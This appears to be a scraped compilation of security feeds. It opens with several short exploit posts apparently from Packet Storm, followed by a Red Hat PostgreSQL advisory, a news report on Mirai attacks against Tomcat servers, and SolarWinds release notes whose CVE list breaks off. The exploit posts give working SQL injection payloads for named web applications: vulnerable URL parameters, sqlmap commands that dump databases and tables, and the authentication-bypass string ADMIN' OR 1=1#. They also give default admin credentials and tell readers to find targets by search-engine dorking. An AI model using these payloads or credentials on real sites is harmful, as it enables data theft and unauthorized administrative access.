B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMS Logistics 2.2 SQL Injection

Aicte India LMS version 3.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 SQL injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING <===== inject here [+] D:\sqlmap>sqlmap.py -u http://vtcbcsreduin/committee.php?n=ANTI-RAGGING  --tables -D vcbtanyb_auctionGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 SQL Injection

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-2454: A flaw was found in PostgreSQL. Certain database calls could permit an attacker with elevated database-level privileges to execute arbitrary code.
* CVE-2023-2455: A flaw was found in PostgreSQL, which could permit incorrect policies being applied in certain cases where role-specific policies are used and a given query is planned under one role and executed under other roles. This scenario can happen under security definer functions, or when a common user and query is planned initially and then re-used across multiple SET ROLEs. Applying an incorrect policy may permit a user to complete otherwise forbidden reads and modifications. This only affects databases that have used CREATE POLICY to define a row security policy.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-07-27

Updated:

2023-07-27

**RHSA-2023:4313 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: rh-postgresql12-postgresql security update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

PostgreSQL is an advanced object-relational database management system (DBMS).  

Security Fix(es):  

*   postgresql: schema\_element defeats protective search\_path changes (CVE-2023-2454)
*   postgresql: row security policies disregard user ID changes after inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted after installing this update.

**Affected Products**

*   Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86\_64
*   Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7 s390x
*   Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7 ppc64le
*   Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86\_64

**Fixes**

*   BZ - 2207568 - CVE-2023-2454 postgresql: schema\_element defeats protective search\_path changes
*   BZ - 2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

**Red Hat Software Collections (for RHEL Server) 1 for RHEL 7**

SRPM

rh-postgresql12-postgresql-12.15-1.el7.src.rpm

SHA-256: 19ef3d1a9c83418ba31c80115f5611a62b7188c88ceb0906b6bf8fe5e97a5787

x86\_64

rh-postgresql12-postgresql-12.15-1.el7.x86\_64.rpm

SHA-256: cefad13560f2e483d4639bc774444b11a849078cc4b6bec4376c2252bbf62235

rh-postgresql12-postgresql-contrib-12.15-1.el7.x86\_64.rpm

SHA-256: 1db601acb9e11aa185f01b16498ecaabe9e2e6f48d13965b5895b879df538100

rh-postgresql12-postgresql-contrib-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: 464ef192a0a46779fe001ef4c009a83869d1d22aeb5484c373f2532a96a0070b

rh-postgresql12-postgresql-debuginfo-12.15-1.el7.x86\_64.rpm

SHA-256: 41a82ef4504f7db7859fcfe1de15ceae71c132ea6eeaf3962e6bd1a3767ec244

rh-postgresql12-postgresql-devel-12.15-1.el7.x86\_64.rpm

SHA-256: 0c65184f39721b4f80b79a5146186d736744224f713c326a68fce138ff4359da

rh-postgresql12-postgresql-docs-12.15-1.el7.x86\_64.rpm

SHA-256: ef31ebfbc24fdab9a9ace857b525d2347e3349fb585bb854af8cfe746ec04b07

rh-postgresql12-postgresql-libs-12.15-1.el7.x86\_64.rpm

SHA-256: e78031971b8a3a8b0f5a1af5803942d181809c2bf79eca9569e6f52349d35362

rh-postgresql12-postgresql-plperl-12.15-1.el7.x86\_64.rpm

SHA-256: 4fa63a59b180e7447c9470a53c0937a839b5bae29cd2b60b947fee173ff3370a

rh-postgresql12-postgresql-plpython-12.15-1.el7.x86\_64.rpm

SHA-256: a5d3e744984ec53e5a6c375fa3ff5fd391d2fe816fcf5846bc4b457b77d8cafb

rh-postgresql12-postgresql-pltcl-12.15-1.el7.x86\_64.rpm

SHA-256: 7aed3bfd75cf657601124a9f50957ca355c684a0e6e93ce698ce3b3538f9574f

rh-postgresql12-postgresql-server-12.15-1.el7.x86\_64.rpm

SHA-256: 0881d19946117698764dc9ada2a4460bd30e2c12f0d246ec37752de09b8be958

rh-postgresql12-postgresql-server-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: a7ce50c8d4de6bf095c2e82ac900fab48da5c14c600381dcbf1046dc210984ea

rh-postgresql12-postgresql-static-12.15-1.el7.x86\_64.rpm

SHA-256: d5527bf0385b9528959d8b09da3d7fa6ce621a5849225b1466fc815ece786e66

rh-postgresql12-postgresql-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: 842e6aecb5f1f09c6e41f1843bd1b4aa33fab582a394c2a85e1201a9951bb065

rh-postgresql12-postgresql-test-12.15-1.el7.x86\_64.rpm

SHA-256: d5afbb888bc79293838f63660b6df291f67601a0bb00c78ae52f49de77922785

**Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7**

SRPM

rh-postgresql12-postgresql-12.15-1.el7.src.rpm

SHA-256: 19ef3d1a9c83418ba31c80115f5611a62b7188c88ceb0906b6bf8fe5e97a5787

s390x

rh-postgresql12-postgresql-12.15-1.el7.s390x.rpm

SHA-256: 44e13171280210672ad289e1fb2b450006d6e49e55a89325b57bf51547ff5fed

rh-postgresql12-postgresql-contrib-12.15-1.el7.s390x.rpm

SHA-256: 291bc83698b851a18714d8fa6c2b331c7510e2c6177d3925e20e4c85c784466b

rh-postgresql12-postgresql-contrib-syspaths-12.15-1.el7.s390x.rpm

SHA-256: 1753b8ae70e1124e207adf1c63ff5729db305a400f0cd91e21f61f4c2578a476

rh-postgresql12-postgresql-debuginfo-12.15-1.el7.s390x.rpm

SHA-256: 6c563a8f36102c0886c1ae68ce77939c0bce26b48e5d9785b42ee91d8e51c29f

rh-postgresql12-postgresql-devel-12.15-1.el7.s390x.rpm

SHA-256: 26c6193fcfde2d9ba6753e6991dcf387f15b1efbfdcacc5a48e7ad1aaa28f713

rh-postgresql12-postgresql-docs-12.15-1.el7.s390x.rpm

SHA-256: 3b3b5db9e4019190f8db299da24500c4f845a68404dc1e697684f4678b02d347

rh-postgresql12-postgresql-libs-12.15-1.el7.s390x.rpm

SHA-256: 03e510ecd100054cb90693e7935f745f687cf9e5a28b386be20528c174771b72

rh-postgresql12-postgresql-plperl-12.15-1.el7.s390x.rpm

SHA-256: 86ff8c7ff3c8d51a107785d46e287758445bb6d5c5ed97a89618a17b8fe1e775

rh-postgresql12-postgresql-plpython-12.15-1.el7.s390x.rpm

SHA-256: edc15790607bad8ce9f8d1d2c506efe3e16f0195f3d837e45f22c0d10d479fd5

rh-postgresql12-postgresql-pltcl-12.15-1.el7.s390x.rpm

SHA-256: c6ffad9497d680f566024694877465ffc7fc8f9e232adb478fc12a69ac2aab85

rh-postgresql12-postgresql-server-12.15-1.el7.s390x.rpm

SHA-256: bcb1f7d69a0009db76929fb63e16c284a1772ba8c3bc4d693729807f2a1f24a9

rh-postgresql12-postgresql-server-syspaths-12.15-1.el7.s390x.rpm

SHA-256: d437991cdb7de1ea6740ad78150200b790f78f160c910332f5232f3bbff753d9

rh-postgresql12-postgresql-static-12.15-1.el7.s390x.rpm

SHA-256: cf71b67d119095248ec8efbbbbb5da13555187e186c516684e7fe73943bc5bb2

rh-postgresql12-postgresql-syspaths-12.15-1.el7.s390x.rpm

SHA-256: 9d0f1bff12795dc0deee5a1a1b59ed6147a4a041ac565f1e44011ce44a696695

rh-postgresql12-postgresql-test-12.15-1.el7.s390x.rpm

SHA-256: 1f030538fed8229c905331d879ba26fd7db8aaf1f4bb79f14984182c5bb864bd

**Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7**

SRPM

rh-postgresql12-postgresql-12.15-1.el7.src.rpm

SHA-256: 19ef3d1a9c83418ba31c80115f5611a62b7188c88ceb0906b6bf8fe5e97a5787

ppc64le

rh-postgresql12-postgresql-12.15-1.el7.ppc64le.rpm

SHA-256: 151fe850421c762c955cf77f2876fcccb5b4c1d0d2d5ab9f746242ee16868b2c

rh-postgresql12-postgresql-contrib-12.15-1.el7.ppc64le.rpm

SHA-256: e6e2889706ac25bc73dbe38cbffe27f37a2569ae04e18521032c8f9505c5693c

rh-postgresql12-postgresql-contrib-syspaths-12.15-1.el7.ppc64le.rpm

SHA-256: 87fe9c123246d0c27409c783a87f59c440049ae02565e4fac0ef2edd6db4b287

rh-postgresql12-postgresql-debuginfo-12.15-1.el7.ppc64le.rpm

SHA-256: 54876de773ccaa115b4ac6348930d18376cba3a4e196992317bf87ddb7e51114

rh-postgresql12-postgresql-devel-12.15-1.el7.ppc64le.rpm

SHA-256: 87cc0f31365ba83b6f986d9cdab4b9f7d454135273cab2c7f773a2adc68d4ef7

rh-postgresql12-postgresql-docs-12.15-1.el7.ppc64le.rpm

SHA-256: 844d9d01dfa5059d4c79cdf47a636d662b697c07969341693432e5a228aaf71a

rh-postgresql12-postgresql-libs-12.15-1.el7.ppc64le.rpm

SHA-256: 8b08a89c18e0c9a5f378d11859ae6a2f0987a6df88a9cf9ae5fe1697f41b298f

rh-postgresql12-postgresql-plperl-12.15-1.el7.ppc64le.rpm

SHA-256: f6dbfdcaf62be4ed6e38c2b7134fd5d4cb0a3d946e9f90e43271e946975af86b

rh-postgresql12-postgresql-plpython-12.15-1.el7.ppc64le.rpm

SHA-256: dba7547b4bf48efac30bb8e935f4dcf022634ac7837bd8dbaa0faf81b9809643

rh-postgresql12-postgresql-pltcl-12.15-1.el7.ppc64le.rpm

SHA-256: 0a4143ea990c82bdb8f8ec8d297331ec0c67566c947b79d3ff109628e422cc5a

rh-postgresql12-postgresql-server-12.15-1.el7.ppc64le.rpm

SHA-256: 479450e5b171fd5f7e6c9a2c38fcbeb4879c58776702a773bbf8a537d64f0d70

rh-postgresql12-postgresql-server-syspaths-12.15-1.el7.ppc64le.rpm

SHA-256: ce403acd02b21c7d2e48661b8c86b1829001590a69f152d1051c17898d1b54e6

rh-postgresql12-postgresql-static-12.15-1.el7.ppc64le.rpm

SHA-256: 36de3a8ccbfc63fccfe6e4573efebd3c8f7046251bc510f0429e75e85b514c74

rh-postgresql12-postgresql-syspaths-12.15-1.el7.ppc64le.rpm

SHA-256: 60b6201a218062fd5d9a0c72f0a7da1bd8070d85fb97b188a8b7bb02d76cf343

rh-postgresql12-postgresql-test-12.15-1.el7.ppc64le.rpm

SHA-256: 3f907e3c27cc2133c326f2195a0ffacf62a1fa77568c3c8995b90f8f5bf7cd14

**Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7**

SRPM

rh-postgresql12-postgresql-12.15-1.el7.src.rpm

SHA-256: 19ef3d1a9c83418ba31c80115f5611a62b7188c88ceb0906b6bf8fe5e97a5787

x86\_64

rh-postgresql12-postgresql-12.15-1.el7.x86\_64.rpm

SHA-256: cefad13560f2e483d4639bc774444b11a849078cc4b6bec4376c2252bbf62235

rh-postgresql12-postgresql-contrib-12.15-1.el7.x86\_64.rpm

SHA-256: 1db601acb9e11aa185f01b16498ecaabe9e2e6f48d13965b5895b879df538100

rh-postgresql12-postgresql-contrib-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: 464ef192a0a46779fe001ef4c009a83869d1d22aeb5484c373f2532a96a0070b

rh-postgresql12-postgresql-debuginfo-12.15-1.el7.x86\_64.rpm

SHA-256: 41a82ef4504f7db7859fcfe1de15ceae71c132ea6eeaf3962e6bd1a3767ec244

rh-postgresql12-postgresql-devel-12.15-1.el7.x86\_64.rpm

SHA-256: 0c65184f39721b4f80b79a5146186d736744224f713c326a68fce138ff4359da

rh-postgresql12-postgresql-docs-12.15-1.el7.x86\_64.rpm

SHA-256: ef31ebfbc24fdab9a9ace857b525d2347e3349fb585bb854af8cfe746ec04b07

rh-postgresql12-postgresql-libs-12.15-1.el7.x86\_64.rpm

SHA-256: e78031971b8a3a8b0f5a1af5803942d181809c2bf79eca9569e6f52349d35362

rh-postgresql12-postgresql-plperl-12.15-1.el7.x86\_64.rpm

SHA-256: 4fa63a59b180e7447c9470a53c0937a839b5bae29cd2b60b947fee173ff3370a

rh-postgresql12-postgresql-plpython-12.15-1.el7.x86\_64.rpm

SHA-256: a5d3e744984ec53e5a6c375fa3ff5fd391d2fe816fcf5846bc4b457b77d8cafb

rh-postgresql12-postgresql-pltcl-12.15-1.el7.x86\_64.rpm

SHA-256: 7aed3bfd75cf657601124a9f50957ca355c684a0e6e93ce698ce3b3538f9574f

rh-postgresql12-postgresql-server-12.15-1.el7.x86\_64.rpm

SHA-256: 0881d19946117698764dc9ada2a4460bd30e2c12f0d246ec37752de09b8be958

rh-postgresql12-postgresql-server-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: a7ce50c8d4de6bf095c2e82ac900fab48da5c14c600381dcbf1046dc210984ea

rh-postgresql12-postgresql-static-12.15-1.el7.x86\_64.rpm

SHA-256: d5527bf0385b9528959d8b09da3d7fa6ce621a5849225b1466fc815ece786e66

rh-postgresql12-postgresql-syspaths-12.15-1.el7.x86\_64.rpm

SHA-256: 842e6aecb5f1f09c6e41f1843bd1b4aa33fab582a394c2a85e1201a9951bb065

rh-postgresql12-postgresql-test-12.15-1.el7.x86\_64.rpm

SHA-256: d5afbb888bc79293838f63660b6df291f67601a0bb00c78ae52f49de77922785

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4313: Red Hat Security Advisory: rh-postgresql12-postgresql security update

Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners.
The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet.
Of these attack attempts, 20% (or

Server Security / Cryptocurrency

Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners.

The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet.

Of these attack attempts, 20% (or 152) entailed the use of a web shell script dubbed "neww" that originated from 24 unique IP addresses, with 68% of them originating from a single IP address (104.248.157\[.\]218).

"The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials associated with it," Aqua security researcher Nitzan Yaakov said.

Upon gaining a successful foothold, the threat actors have been observed deploying a WAR file that contains a malicious web shell class named 'cmd.jsp' that, in turn, is designed to listen to remote requests and execute arbitrary commands on the Tomcat server.

This includes downloading and running a shell script called "neww" after which the file is deleted using the "rm -rf" Linux command.

"The script contains links to download 12 binary files, and each file is suitable for a specific architecture according to the system that has been attacked by the threat actor," Yaakov pointed out.

The final stage malware is a variant of the infamous Mirai botnet that makes use of the infected hosts to orchestrate distributed denial-of-service (DDoS) attacks.

"Once the threat actor gained access to the web application manager using valid credentials, they leveraged the platform to upload a web shell disguised in a WAR file," Yaakov said. "Next, the threat actor executed commands remotely and launched the attack."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

To mitigate against the ongoing campaign, it's recommended that organizations secure their environments and follow credential hygiene to prevent brute-force attacks.

The development comes as the AhnLab Security Emergency Response Center (ASEC) reported that poorly managed MS-SQL servers are being breached to deploy a rootkit malware called Purple Fox, which acts as a loader to fetch additional malware such as coin miners.

These findings also demonstrate the lucrative nature of cryptocurrency mining, which has witnessed a 399% increase over last year, with 332 million cryptojacking attacks recorded in the first half of 2023 globally, according to SonicWall.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Target Apache Tomcat Servers for Mirai Botnet and Crypto Mining

The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

Release date: July 25, 2023

Here's what's new in SolarWinds Platform 2023.3.

**Learn more**

*   Get information about the latest hotfixes.
*   See SolarWinds Platform 2023.3 System Requirements. For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

*   Support for OpenSSL 3.0
    
*   IIS Centralized Certificate Store can be used for the website in the Configuration Wizard.
    
*   Advanced Option in the Configuration Wizard can be used to change the database connection string only, without the need to perform all other tasks typically executed by the Configuration Wizard.
    
*   AlertStack updates: AlertStack cluster lifetime introduced to automatically close alert stacks after 7 days.
    
*   WorldWide map updates: modifiable WorldWide Map API key support.
    
*   SolarWinds Platform Maps updates: support for displaying the SolarWinds Platform Map on group details view dynamically, based on the group name variable.
    

Return to top

**Fixes**

 

Case number

Description

1293506

The issue where missing free poller licenses caused the Syslog and Traps services to shutdown automatically was addressed.

1202531, 1247388, 1281162, 1305768

Issues with the database upgrade in the Configuration Wizard were addressed.

1271994, 1275876, 1286508, 1294838, 1299411, 1300047, 1304414, 1306968, 1315810, 1316267, 1319417, 1327780, 1328324, 1328441, 1332954, 1337486, 1337686, 1338228, 1348951, 1353130, 1353219, 1353694, 1359474, 1366344, 1367866, 1378873

The issue where unsuccessful login attempts generated by the SolarWinds Platform occurred on the SQL Server was addressed.

1372599

The issue with changing Microsoft EWS API endpoint was addressed.

1360566

The issue with informing users on reaching the license limit was addressed.

1355720

The issue where values for entities monitored by the API poller were not displayed on the SolarWinds Platform widget was addressed.

1315625, 1336784, 1337676, 1358723, 1359224, 1362623, 1372298

The issue where JobEngine was unable to submit a job which resulted in polling issues was addressed.

1353784

The issue where database maintenance failed when removing temporary system files was addressed.

1327342

An issue with muting/unmuting alerts on the Node Management page were addressed.

1351829

The issue where the Centralized Upgrade didn’t prompt users to upgrade scalability engines was addressed.

1306932

Issues with custom properties on SolarWinds Platform deployed in US English but displayed in a browser with different language settings were addressed.

Issues included custom properties for worldwide maps not displayed, inability to edit datetime custom properties, or inability to add or edit custom properties with decimal point values.

1334416, 1350577, 1351585

The issue where alerts using the create ServiceNow incident did not fill in the Assigned To field was addressed.

1333444, 1334126, 1349746, 1358156

The issue where RabbitMQ failed during the upgrade to 2023.2 due to an %%2 error was addressed.

1307772

The issue where groups were hidden if they were added to a map was addressed.

1317479

The issue with default operating system proxy settings not applied was addressed.

1247339, 1269949, 1314666, 1329373, 1351993, 1364314

The issue with JobEngine not starting after the system restart was addressed.

1312232

The issue where the Edit option in the Custom Property Manager was visible for accounts without administrator privileges was addressed.

1197599, 1259651

The issue with upgrading the SolarWinds Platform when the deployment used an Azure SQL database was addressed.

1237057

Performance degradation issues caused by a large number of SSH sessions were addressed.

1287338

Issues with creating nested groups were addressed.

1232188, 1267357

The issue with the "Reference not supported in this version error of SQL Server" messages on Azure SQL was addressed.

1237618

The issue with the Insert Variable button not working when you configure an action that should create a new ServiceNow incident and change the ServiceNow instance was addressed.

824321, 1109050, 1226319, 1293208

The issue with invoking the GetScheduledListResourcesStatus verb initiated from an Additional polling engine was addressed.

1265116

User interface issues on a pop-up for selecting properties when creating a ServiceNow action were addressed.

1286407

Issues with objects on SolarWinds Platform Maps that are outside of the visible grid were addressed.

932494

The issue where the edit option for editing a custom property value is blocked because two additional properties are selected automatically was addressed.

766327, 942393

The issue where you could not remove unused custom properties was addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

**SolarWinds CVEs**

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2023-23844

SolarWinds Platform Incomplete List of Disallowed Inputs Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33225

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33224

SolarWinds Platform Incorrect Behavior Order Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with NETWORK SERVICE privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-23843

SolarWinds Platform Incorrect Comparison Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33229

SolarWinds Platform Incorrect Input Neutralization Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject passive HTML.

3.1 Low

Juampa Rodriguez (@UnD3sc0n0c1d0)

CVE-2023-3622

